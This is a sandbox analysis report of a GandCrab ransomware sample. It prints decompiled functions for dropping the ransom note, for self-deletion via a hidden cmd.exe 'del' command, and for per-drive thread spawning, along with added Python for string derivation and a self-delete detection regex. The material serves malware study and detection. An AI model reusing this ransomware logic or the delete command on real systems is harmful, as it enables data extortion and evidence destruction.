                                        					_t15 = _t93 + 4; // 0x4
                                        					_t75 = _t15 + _t63 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                        					_t92 = lstrlenW( *(_t86 + 0x38));
                                        					_t60 = lstrlenW( *(_t86 + 0x34));
                                        					_t19 = _t92 + 4; // 0x4
                                        					_t75 = _t19 + _t60 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                        					_t91 = lstrlenW( *(_t86 + 0x44));
                                        					_t57 = lstrlenW( *(_t86 + 0x40));
                                        					_t23 = _t91 + 4; // 0x4
                                        					_t75 = _t23 + _t57 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                        					_t90 = lstrlenW( *(_t86 + 0x50));
                                        					_t54 = lstrlenW( *(_t86 + 0x4c));
                                        					_t27 = _t90 + 4; // 0x4
                                        					_t75 = _t27 + _t54 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                        					_t89 = lstrlenW( *(_t86 + 0x5c));
                                        					_t51 = lstrlenW( *(_t86 + 0x58));
                                        					_t31 = _t89 + 4; // 0x4
                                        					_t75 = _t31 + _t51 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                        					_t75 = _t75 + 0x14;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                        					_t88 = lstrlenW( *(_t86 + 0x7c));
                                        					_t48 = lstrlenW( *(_t86 + 0x78));
                                        					_t36 = _t88 + 4; // 0x4
                                        					_t75 = _t36 + _t48 + _t75;
                                        				}
                                         				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                         					return _t75; // running total: lstrlenW(a) + lstrlenW(b) + 4 for every field pair whose flag is set
                                         				} else {
                                         					_t42 = lstrlenW( *(_t86 + 0x88));
                                         					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42; // last pair handled inline
                                         				}
                                        			}
                                         Instruction addresses for this function (one per decompiled line; the line alignment was lost in extraction): 0x0fc67140 to 0x0fc672ac.

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                        • lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67288
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67296
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                         • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID:
                                        • API String ID: 1659193697-0
                                        • Opcode ID: 344bc6df6f17eb5d75970bce0a6112b1c5b1d66c1eff5dc9942ec81b193a32d3
                                        • Instruction ID: 771d46ce8a368b329dac43ceac7b2085a29d482d8062802d4652d9162f0cb91a
                                        • Opcode Fuzzy Hash: 344bc6df6f17eb5d75970bce0a6112b1c5b1d66c1eff5dc9942ec81b193a32d3
                                        • Instruction Fuzzy Hash: 9B415132108613EFC7115FB9DE8E794B7A1FF0432AF084935E51692A21D77AB978DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			// Appends the ASCII string stored at offset 0x4E of the sample's own on-disk image to the
                                         			// caller's wide string (__ecx), widening each byte to a UTF-16 unit by interleaving NUL bytes.
                                         			// In the standard MSVC DOS stub, offset 0x4E (0x40 + the 14 stub code bytes) is the start of
                                         			// "This program cannot be run in DOS mode." followed by "\r\r\n$" up to the first NUL, so on an
                                         			// unmodified stub that whole text is appended; a custom or stripped stub changes the result.
                                         			E0FC653A0(WCHAR* __ecx) {
                                         				CHAR* _v8;
                                         				void* _v12;
                                         				void* _v16;
                                         				void* _v20;
                                         				void* _v24;
                                         				void* _t22;
                                         				void* _t24;
                                         				signed int _t26;
                                         				int _t30;
                                         				char _t32;
                                         				void* _t33;
                                         				signed char _t34;
                                         				CHAR* _t36;
                                         				WCHAR* _t37;
                                         				WCHAR* _t38;
                                         				void* _t39;
                                         				CHAR* _t40;
                                         
                                         				_t37 = __ecx;
                                         				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40); // MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
                                         				_v20 = _t39;
                                         				GetModuleFileNameW(0, _t39, 0x200); // path of the running executable
                                         				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0); // GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING
                                         				_v16 = _t33;
                                         				if(_t33 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                         					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0); // PAGE_WRITECOPY
                                         					_v24 = _t22;
                                         					if(_t22 != 0) {
                                         						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0); // FILE_MAP_COPY, whole file
                                         						_v12 = _t24;
                                         						if(_t24 != 0) {
                                         							_t5 = _t24 + 0x4e; // 0x4e: DOS stub message text
                                         							_t40 = _t5;
                                         							_v8 = _t40;
                                         							_t26 = lstrlenW(_t37);
                                         							_t34 = 0;
                                         							_t38 =  &(_t37[_t26]); // write position: end of the caller's string
                                         							if(lstrlenA(_t40) + _t27 != 0) { // _t27 is an unresolved decompiler temporary
                                         								_t36 = _t40;
                                         								do {
                                         									if((_t34 & 0x00000001) != 0) {
                                         										 *((char*)(_t38 + _t34)) = 0; // odd byte offset: high byte of the UTF-16 unit
                                         									} else {
                                         										_t32 =  *_t40;
                                         										_t40 =  &(_t40[1]);
                                         										 *((char*)(_t38 + _t34)) = _t32; // even byte offset: next ASCII byte
                                         									}
                                         									_t34 = _t34 + 1;
                                         									_t30 = lstrlenA(_t36);
                                         									_t36 = _v8;
                                         								} while (_t34 < _t30 + _t30); // 2 bytes per source character; no terminator is written
                                         							}
                                         							UnmapViewOfFile(_v12);
                                         							_t33 = _v16;
                                         							_t39 = _v20;
                                         						}
                                         						CloseHandle(_v24);
                                         					}
                                         					CloseHandle(_t33);
                                         				}
                                         				return VirtualFree(_t39, 0, 0x8000); // MEM_RELEASE
                                         			}
                                         Instruction addresses for this function (one per decompiled line; the line alignment was lost in extraction): 0x0fc653b7 to 0x0fc6549b.

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,0FC655B2), ref: 0FC653B9
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FC655B2), ref: 0FC653CC
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0FC655B2), ref: 0FC653E5
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0FC655B2), ref: 0FC65404
                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0FC655B2), ref: 0FC6541A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,0FC655B2), ref: 0FC6542E
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0FC655B2), ref: 0FC6543A
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0FC655B2), ref: 0FC65459
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,0FC655B2), ref: 0FC6546B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,0FC655B2), ref: 0FC6547A
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0FC655B2), ref: 0FC65481
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FC655B2), ref: 0FC6548F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                         • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                        • String ID:
                                        • API String ID: 869890170-0
                                        • Opcode ID: 76b1bcb71e7b9b71f45f8852fada5b8a809c4a06aead34f91042aa664833f4c8
                                        • Instruction ID: e4f3718cfe99b6caf0ed0978973985537ad2bafc96beacd88aaf0e15a718ef4a
                                        • Opcode Fuzzy Hash: 76b1bcb71e7b9b71f45f8852fada5b8a809c4a06aead34f91042aa664833f4c8
                                        • Instruction Fuzzy Hash: 4231E730748316FBE7204FA59C8BFAD7B78EF05B12F244454F741BA1C1CAB9A5108B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%
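The derivation in E0FC653A0 above is easy to get subtly wrong by hand (the copied text runs past the sentence up to the first NUL, and the result depends on the stub the linker emitted). The following is an added example, not code from the sample, from Joe Sandbox or from the report, that re-implements the same steps in Python so an analyst can compute the appended text for any given PE. The PE bytes it runs on are constructed inline; the 14 stub code bytes are the standard MSVC DOS stub, and the offset 0x4E is the one the function hard-codes.

```python
# Added example (not code from the sample or from Joe Sandbox): re-implements the string
# derivation of E0FC653A0 so an analyst can compute, from a given PE file, the text the
# sample appends. The PE bytes below are constructed, not taken from the report.
import struct

DOS_STUB_CODE = bytes.fromhex("0E1FBA0E00B409CD21B8014CCD21")  # 14 bytes at 0x40 in the standard MSVC stub
STUB_MESSAGE_OFFSET = 0x4E  # 0x40 + len(DOS_STUB_CODE); the offset E0FC653A0 hard-codes


def dos_stub_string(pe: bytes) -> bytes:
    """Return the NUL-terminated ASCII bytes starting at offset 0x4E, as lstrlenA would see them."""
    end = pe.find(b"\x00", STUB_MESSAGE_OFFSET)
    if end < 0:
        end = len(pe)
    return pe[STUB_MESSAGE_OFFSET:end]


def widen_like_sample(src: bytes) -> bytes:
    """Reproduce the copy loop: even byte offsets take the next source byte, odd ones a NUL,
    for 2*len(src) bytes. No terminator is written; the sample relies on a zeroed buffer."""
    out = bytearray(2 * len(src))
    pos = 0
    for i in range(2 * len(src)):
        if i & 1:
            out[i] = 0
        else:
            out[i] = src[pos]
            pos += 1
    return bytes(out)


def derive_wide_string(prefix: str, pe: bytes) -> str:
    """prefix is the wide string passed in ECX; the widened stub text is appended to it."""
    return prefix + widen_like_sample(dos_stub_string(pe)).decode("utf-16-le")


def build_dos_header(message: bytes) -> bytes:
    """Constructed minimal MZ header + stub: enough of a PE image for the derivation above."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x100)  # e_lfanew; not used by the derivation
    return bytes(hdr) + DOS_STUB_CODE + message + b"\x00" * 8


# Two constructed images: the stock linker stub and a custom one, to show the result changes.
STANDARD_STUB = build_dos_header(b"This program cannot be run in DOS mode.\r\r\n$")
CUSTOM_STUB = build_dos_header(b"custom stub text$")


if __name__ == "__main__":
    print(repr(derive_wide_string("X", STANDARD_STUB)))
    print(repr(derive_wide_string("X", CUSTOM_STUB)))
```

To run it against a real file, pass `open(path, "rb").read()` as `pe`. Note that the appended text carries the `\r\r\n$` that follows the sentence in the stock stub, so any string comparison or YARA/mutex check built on this value must include those four characters.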

                                        C-Code - Quality: 100%
                                         			// Drops the ransom note "GDCB-DECRYPT.txt" into the directory named by _t21 (the decompiler lost
                                         			// its assignment; from the signature it is presumably the __ecx argument), writing the note body
                                         			// held in the global at 0xfc72a64. The file is opened with CREATE_NEW and ERROR_ALREADY_EXISTS
                                         			// counts as success, so each directory receives one note and a second pass over it is a no-op.
                                         			E0FC66BE0(void* __ecx) {
                                         				long _v8;
                                         				WCHAR* _t7;
                                         				signed int _t16;
                                         				void* _t21;
                                         				void* _t22;
                                         				void* _t25;
                                         
                                         				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40); // buffer for the note path
                                         				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21); // _t21: target directory
                                         				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0); // GENERIC_WRITE, no sharing, CREATE_NEW
                                         				if(_t22 != 0xffffffff) {
                                         					_t7 =  *0xfc72a64; // 0x1f2000 -- pointer to the wide-string note body
                                         					if(_t7 != 0) {
                                         						WriteFile(_t22,  *0xfc72a64, lstrlenW(_t7) + _t11,  &_v8, 0); // _t11 is an unresolved decompiler temporary
                                         					}
                                         					CloseHandle(_t22);
                                         					_t16 = 1; // note written
                                         				} else {
                                         					_t16 = 0 | GetLastError() == 0x000000b7; // 1 if ERROR_ALREADY_EXISTS, otherwise 0
                                         				}
                                         				VirtualFree(_t25, 0, 0x8000);
                                         				return _t16;
                                         			}
                                         Instruction addresses for this function (one per decompiled line; the line alignment was lost in extraction): 0x0fc66bfb to 0x0fc66c86.

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FC66CC2,00000000,?,?), ref: 0FC66BF5
                                        • wsprintfW.USER32 ref: 0FC66C03
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FC66C1F
                                        • GetLastError.KERNEL32(?,?), ref: 0FC66C2C
                                        • lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0FC66C4E
                                        • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FC66C5E
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0FC66C65
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FC66C78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                         • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                        • String ID: %s\GDCB-DECRYPT.txt
                                        • API String ID: 2985722263-4054134092
                                        • Opcode ID: 15a416c445b8e6dce533fe37c4250fd2648c51fb592dbd39ccb0a5029495a017
                                        • Instruction ID: 5d778437e345c3c2d9869f4e1b91cef97bb80bd279ef062cff24ad0225305cd4
                                        • Opcode Fuzzy Hash: 15a416c445b8e6dce533fe37c4250fd2648c51fb592dbd39ccb0a5029495a017
                                        • Instruction Fuzzy Hash: D0017575348301BBF3201B66AD8BF6A3B6CEB45B36F100114FB05F91C1DBA969209769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			// Self-deletion: spawns cmd.exe to delete the sample's own executable, then exits so the file is
                                         			// no longer in use when del runs. The command line uses "timeout -c 5", which is not a switch
                                         			// timeout.exe accepts; because the two commands are joined with "&" rather than "&&", del runs
                                         			// whether or not the delay fails.
                                         			E0FC65190() {
                                         				WCHAR* _t6;
                                         				short* _t8;
                                         
                                         				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4); // PAGE_READWRITE buffer for the module path
                                         				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4); // buffer for the cmd.exe argument string
                                         				if(_t6 != 0) {
                                         					GetModuleFileNameW(0, _t6, 0x200); // full path of the running executable
                                         					if(_t8 != 0) {
                                         						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                         						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0); // nShowCmd 0 = SW_HIDE
                                         					}
                                         				}
                                         				ExitProcess(0); // never returns; the two buffers are never freed
                                         			}
                                         Instruction addresses for this function (one per decompiled line; the line alignment was lost in extraction): 0x0fc651b6 to 0x0fc651fb.

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FC65392,00000000), ref: 0FC651A6
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC651B8
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FC651C8
                                        • wsprintfW.USER32 ref: 0FC651D9
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FC651F3
                                        • ExitProcess.KERNEL32 ref: 0FC651FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                         • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                        • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                        • API String ID: 4033023619-516011104
                                        • Opcode ID: 302d2383e68f5d2c660c836f7cba11166f49a15639861a9a8fcc5e93e9e525e7
                                        • Instruction ID: 033824e59e59782c63030a725b8081e9162e938a943f724278b9d549a3e9cbaa
                                        • Opcode Fuzzy Hash: 302d2383e68f5d2c660c836f7cba11166f49a15639861a9a8fcc5e93e9e525e7
                                        • Instruction Fuzzy Hash: 7BF065317CD311B7F13116565C5FF472D689B85F26F280014F705BE1C299E46510C7AD
                                        Uniqueness

                                        Uniqueness Score: -1.00%
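The self-deletion routine E0FC65190 leaves a distinctive process-creation event: cmd.exe launched by the sample with a "timeout ... & del "<path>" /f /q" argument where the deleted path is the parent's own image. The detector below is an added example, not code from the report, the sample or any vendor. It runs over constructed events; the event field names (image, command_line, parent_image) and the file paths are assumptions standing in for whatever your EDR or Sysmon Event ID 1 pipeline produces.

```python
# Added example (not code from the sample, Joe Sandbox or any vendor): a detector for the
# self-deletion pattern of E0FC65190, run over constructed process-creation events. The event
# shape (image, command_line, parent_image) is an assumption standing in for real telemetry.
import re
from typing import Dict, Iterable, List

# Matches the argument E0FC65190 builds: /c timeout -c 5 & del "<path>" /f /q.
# timeout.exe does not accept "-c"; with "&" instead of "&&", del runs whether or not the delay fails,
# so the pattern deliberately allows any timeout arguments rather than keying on "-c 5".
SELF_DELETE_RE = re.compile(
    r'/c\s+timeout\b[^&]*&\s*del\s+"(?P<target>[^"]+)"\s+/f\s+/q',
    re.IGNORECASE,
)

CMD_IMAGE = "cmd.exe"


def self_delete_alerts(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag cmd.exe launches that delete a file via the timeout-then-del shape.

    The verdict is "self-delete" when the del target equals the parent process image
    (the exact situation E0FC65190 creates) and a lower-confidence label otherwise."""
    alerts: List[Dict[str, str]] = []
    for ev in events:
        if not ev["image"].lower().endswith(CMD_IMAGE):
            continue
        m = SELF_DELETE_RE.search(ev["command_line"])
        if not m:
            continue
        target = m.group("target")
        alert = {"target": target, "parent_image": ev["parent_image"]}
        if target.lower() == ev["parent_image"].lower():
            alert["verdict"] = "self-delete"
        else:
            # Same command shape but a different file: installers do this too, so lower confidence.
            alert["verdict"] = "delete-via-timeout-pattern"
        alerts.append(alert)
    return alerts


# Constructed events; the paths mirror the report's sample name but are not real telemetry.
SAMPLE_EVENTS = [
    {   # what the ShellExecuteW call in E0FC65190 produces
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Users\user\Desktop\gI5xZdIxUs.exe" /f /q',
        "parent_image": r"C:\Users\user\Desktop\gI5xZdIxUs.exe",
    },
    {   # an installer cleaning up a temp file: same shape, different target
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'cmd.exe /c timeout /t 5 & del "C:\Users\user\AppData\Local\Temp\setup.log" /f /q',
        "parent_image": r"C:\Program Files\Vendor\setup.exe",
    },
    {   # unrelated cmd.exe use
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"cmd.exe /c dir C:\Users",
        "parent_image": r"C:\Windows\explorer.exe",
    },
]


if __name__ == "__main__":
    for alert in self_delete_alerts(SAMPLE_EVENTS):
        print(alert)
```

Because the sample calls ExitProcess immediately after ShellExecuteW, the parent is usually gone by the time an analyst looks; the parent image path recorded at process creation is what makes the comparison possible, so the rule depends on telemetry that captures it.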

                                        C-Code - Quality: 84%
                                         			// Window procedure of the decoy window. Message 0x0F (WM_PAINT) draws the literal "GandCrab!",
                                         			// assembled on the stack from the 16 bytes at 0xfc6f280 (L"GandCrab") plus the dword 0x21 at
                                         			// 0xfc6f290 (L"!" and its terminator); message 0x02 (WM_DESTROY) starts a worker thread at
                                         			// E0FC62AD0, destroys the window and returns the marker 0xdeadbeef. Everything else goes to
                                         			// DefWindowProcW.
                                         			E0FC62C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                         				struct tagPAINTSTRUCT _v68;
                                         				struct tagPAINTSTRUCT _v88;
                                         				short _v100;
                                         				intOrPtr _t13;
                                         				void* _t15;
                                         				struct HDC__* _t21;
                                         				int _t30;
                                         
                                         				_t13 =  *0xfc6f290; // 0x21 -- L"!" followed by NUL
                                         				asm("movdqu xmm0, [0xfc6f280]"); // 16 bytes: L"GandCrab"
                                         				_t30 = _a8; // uMsg
                                         				_v88.fErase = _t13; // sits 16 bytes after _v100, completing L"GandCrab!"
                                         				asm("movdqu [esp+0x10], xmm0"); // stores L"GandCrab" at _v100
                                         				_t15 = _t30 - 2;
                                         				if(_t15 == 0) { // WM_DESTROY
                                         					CreateThread(0, 0, E0FC62AD0, 0, 0, 0);
                                         					DestroyWindow(_a4);
                                         					return 0xdeadbeef;
                                         				} else {
                                         					if(_t15 == 0xd) { // 0x0F: WM_PAINT
                                         						_t21 = BeginPaint(_a4,  &_v68);
                                         						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100)); // draws "GandCrab!" at (5,5)
                                         						EndPaint(_a4,  &_v88);
                                         						return 0;
                                         					} else {
                                         						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                         					}
                                         				}
                                         			}
                                         Instruction addresses for this function (one per decompiled line; the line alignment was lost in extraction): 0x0fc62c59 to 0x0fc62d01.

                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0FC62C8A
                                        • BeginPaint.USER32(?,?), ref: 0FC62C9F
                                        • lstrlenW.KERNEL32(?), ref: 0FC62CAC
                                        • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FC62CBD
                                        • EndPaint.USER32(?,?), ref: 0FC62CCB
                                        • CreateThread.KERNEL32 ref: 0FC62CE9
                                        • DestroyWindow.USER32(?), ref: 0FC62CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                        • String ID: GandCrab!
                                        • API String ID: 572880375-2223329875
                                        • Opcode ID: fd5b9dacf51ff4129e0c5b9efb573899de362771c8f353df05ae4cb75d603726
                                        • Instruction ID: 713981951e9c02d9dcd35cfcb1a37567976fd8b97c8a4862971263d1734d0396
                                        • Opcode Fuzzy Hash: fd5b9dacf51ff4129e0c5b9efb573899de362771c8f353df05ae4cb75d603726
                                        • Instruction Fuzzy Hash: 4811B63250820ABBD711DF54EC0BFEA7BA8FB48322F000616FE41E5190E7719520DB91
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0FC63E20(struct _SECURITY_ATTRIBUTES* __ecx) {
                                        				char _v612;
                                        				char _v644;
                                        				void* _v908;
                                        				void* _v912;
                                        				intOrPtr _v916;
                                        				intOrPtr _v920;
                                        				short _v924;
                                        				signed int _v928;
                                        				void* _v932;
                                        				void* _v936;
                                        				intOrPtr _v940;
                                        				intOrPtr _v944;
                                        				intOrPtr _v948;
                                        				long _v952;
                                        				struct _SECURITY_ATTRIBUTES* _v956;
                                        				struct _SECURITY_ATTRIBUTES* _v960;
                                        				struct _SECURITY_ATTRIBUTES* _v964;
                                        				char _v968;
                                        				void* _t67;
                                        				short _t68;
                                        				intOrPtr _t69;
                                        				int _t72;
                                        				long _t75;
                                        				signed int _t77;
                                        				signed int _t80;
                                        				intOrPtr* _t82;
                                        				void* _t84;
                                        				struct _SECURITY_ATTRIBUTES* _t87;
                                        				long _t88;
                                        				intOrPtr _t89;
                                        				intOrPtr _t92;
                                        				intOrPtr _t95;
                                        				char _t101;
                                        				intOrPtr _t106;
                                        				void _t110;
                                        				struct _SECURITY_ATTRIBUTES** _t114;
                                        				intOrPtr _t115;
                                        				signed int _t119;
                                        				void* _t121;
                                        
                                        				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                        				_t87 = __ecx;
                                        				_v964 = __ecx;
                                        				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                        				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                        				_t88 = 0;
                                        				 *_t67 = 0x43;
                                        				_t68 =  *L"?:\\"; // 0x3a003f
                                        				_v924 = _t68;
                                        				_t69 =  *0xfc6f348; // 0x5c
                                        				_v920 = _t69;
                                        				_v968 = GetTickCount();
                                        				_t114 =  &_v644;
                                        				_t110 = 0x41;
                                        				do {
                                        					_v924 = _t110;
                                        					_t72 = GetDriveTypeW( &_v924);
                                        					if(_t72 >= 2 && _t72 != 5) {
                                        						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                        						_t84 = _t114 - 8;
                                        						 *_t84 = _t110;
                                        						 *_t114 = 0;
                                        						_t114[2] = 0;
                                        						_t114[3] = 0;
                                        						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FC66DE0, _t84, 0, 0);
                                        						_t88 = _t88 + 1;
                                        						_t114 =  &(_t114[6]);
                                        					}
                                        					_t110 = _t110 + 1;
                                        				} while (_t110 <= 0x5a);
                                        				_v952 = _t88;
                                        				asm("xorps xmm0, xmm0");
                                        				_v956 = 0;
